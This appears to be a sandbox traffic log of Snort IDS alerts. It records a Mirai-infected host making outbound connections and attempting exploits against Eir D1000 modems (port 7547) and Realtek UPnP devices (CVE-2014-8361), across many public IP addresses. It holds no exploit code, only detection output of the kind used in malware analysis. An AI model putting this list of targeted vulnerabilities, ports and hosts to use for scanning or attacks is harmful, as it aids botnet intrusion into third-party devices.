Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38378 -> 195.154.138.94:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41230 -> 195.123.227.219:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47884 -> 80.79.16.162:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39036 -> 80.210.108.222:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60958 -> 80.61.4.189:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41522 -> 80.124.51.50:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41146 -> 80.68.181.175:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53374 -> 80.137.224.210:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55540 -> 169.197.131.44:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53814 -> 80.72.75.71:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51412 -> 80.251.237.142:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49132 -> 82.165.247.162:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53796 -> 82.0.52.118:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40516 -> 82.64.100.224:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41834 -> 82.223.65.66:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34172 -> 82.181.84.64:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39196 -> 82.135.139.67:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57870 -> 82.181.204.30:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59834 -> 82.166.183.124:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58694 -> 82.149.130.44:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55558 -> 200.71.58.187:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56330 -> 200.24.218.81:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40138 -> 200.54.70.24:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55458 -> 41.105.24.11:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55468 -> 41.105.24.11:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40118 -> 80.149.74.238:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37568 -> 80.209.229.62:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59454 -> 200.89.87.119:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45704 -> 85.215.86.10:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57388 -> 82.165.182.169:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38106 -> 82.94.246.79:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41576 -> 82.150.48.65:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42944 -> 83.149.90.16:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57516 -> 82.211.22.201:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58196 -> 82.211.40.201:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52522 -> 82.73.231.83:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51626 -> 83.194.24.171:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49540 -> 83.140.108.221:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40136 -> 82.65.94.240:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36544 -> 82.223.114.45:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46868 -> 82.202.163.216:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50448 -> 82.209.201.57:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37826 -> 83.144.85.126:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38292 -> 83.167.171.85:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50546 -> 83.171.73.147:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57540 -> 83.97.108.209:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44428 -> 83.59.139.169:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59950 -> 109.158.232.229:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60028 -> 109.158.232.229:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44898 -> 82.98.80.230:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45158 -> 82.165.184.183:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52778 -> 82.165.114.152:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58292 -> 80.67.66.185:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43400 -> 82.100.5.68:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56504 -> 80.157.246.62:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46952 -> 82.148.192.114:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44216 -> 80.190.163.2:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38082 -> 80.86.87.230:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49120 -> 82.117.205.158:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58064 -> 82.195.158.192:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49712 -> 80.158.40.150:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34062 -> 82.64.175.19:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35116 -> 80.210.89.130:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34648 -> 80.211.244.44:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55104 -> 80.82.153.153:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53740 -> 82.223.30.89:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49324 -> 82.223.215.64:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51258 -> 80.211.83.170:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52190 -> 80.232.220.56:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59746 -> 80.51.20.182:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53602 -> 80.253.245.143:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46062 -> 88.198.220.218:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57262 -> 46.20.3.189:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57064 -> 78.142.213.46:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34520 -> 77.108.239.202:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38544 -> 78.165.2.250:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35130 -> 37.144.21.156:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34658 -> 77.108.239.202:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38686 -> 78.165.2.250:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38894 -> 99.252.21.189:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58176 -> 72.136.65.80:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35270 -> 37.144.21.156:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47888 -> 136.36.159.121:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49156 -> 95.57.79.134:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58318 -> 72.136.65.80:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:39044 -> 99.252.21.189:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48034 -> 136.36.159.121:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53726 -> 118.38.75.51:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40442 -> 95.210.68.7:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53730 -> 118.38.75.51:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49286 -> 82.165.241.211:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57748 -> 61.114.197.151:80 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59572 -> 78.173.208.161:52869 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59574 -> 78.173.208.161:52869 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51690 -> 206.189.123.167:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53362 -> 178.194.152.222:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42390 -> 178.254.40.55:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36914 -> 178.128.255.14:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50246 -> 178.32.83.99:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60230 -> 178.62.184.241:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39884 -> 178.162.203.219:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44388 -> 178.62.88.119:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46724 -> 178.62.13.25:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58784 -> 178.251.130.251:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53782 -> 178.75.178.122:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38948 -> 83.217.68.103:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55822 -> 178.154.194.137:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33222 -> 178.67.166.88:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42360 -> 178.150.200.114:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48674 -> 83.166.149.157:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47784 -> 83.65.141.86:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37120 -> 83.142.225.207:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36592 -> 83.1.196.7:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42978 -> 83.222.177.106:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43264 -> 83.137.54.9:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46620 -> 83.243.232.65:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47554 -> 83.30.100.131:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55230 -> 178.61.152.2:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54408 -> 178.128.96.252:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56442 -> 85.143.220.232:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60746 -> 83.166.146.47:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45278 -> 83.166.135.55:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42434 -> 178.79.193.194:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52880 -> 178.254.6.12:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56996 -> 83.140.111.199:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47692 -> 178.248.239.19:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50558 -> 178.32.13.118:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33222 -> 178.183.169.120:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60314 -> 178.33.202.134:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45348 -> 178.77.242.48:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:32806 -> 178.255.171.50:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48934 -> 178.169.193.200:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47480 -> 178.34.113.23:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52222 -> 178.154.247.230:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50522 -> 178.166.31.190:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49482 -> 95.111.243.225:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40178 -> 178.22.169.231:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53210 -> 178.242.99.255:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44204 -> 178.88.3.222:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34742 -> 178.145.12.217:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33466 -> 178.183.98.61:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58912 -> 178.128.83.227:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:42716 -> 103.164.102.163:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48358 -> 78.169.61.149:7547 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54190 -> 164.132.190.190:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58044 -> 119.210.198.52:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35908 -> 86.151.157.17:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57882 -> 83.169.19.7:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33450 -> 83.86.174.133:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40236 -> 178.22.169.231:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52286 -> 83.241.188.33:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48392 -> 78.169.61.149:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40876 -> 83.33.187.127:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35932 -> 86.151.157.17:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54154 -> 24.56.114.77:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35626 -> 83.40.54.171:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:42740 -> 103.164.102.163:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58546 -> 83.58.81.54:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44036 -> 178.90.71.145:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54212 -> 24.56.114.77:7547 |
Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48418 -> 164.155.155.43:52869 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35732 -> 181.214.183.211:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54450 -> 98.206.125.209:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58104 -> 119.210.198.52:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36888 -> 47.146.134.248:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41942 -> 95.131.137.33:80 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37324 -> 95.111.226.135:80 |
Source: Traffic | Snort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46526 -> 164.115.138.85:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37438 -> 189.60.232.244:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54480 -> 98.206.125.209:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43124 -> 95.58.197.70:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36924 -> 47.146.134.248:7547 |
Source: Traffic | Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35806 -> 95.78.160.221:80 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:32908 -> 181.80.223.1:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37490 -> 189.60.232.244:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54196 -> 181.114.153.176:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41134 -> 209.93.37.231:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41394 -> 209.93.37.231:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45060 -> 105.110.8.139:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44682 -> 173.171.86.25:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:52590 -> 45.36.95.180:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40012 -> 92.95.230.7:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45210 -> 105.110.8.139:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40018 -> 92.95.230.7:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:35402 -> 14.62.208.103:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55346 -> 222.104.93.31:7547 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41836 -> 181.164.50.172:7547 |
Source: Traffic | Snort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35076 -> 83.169.16.144:80 |
Source: Traffic | Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44946 -> 173.171.86.25:7547 |
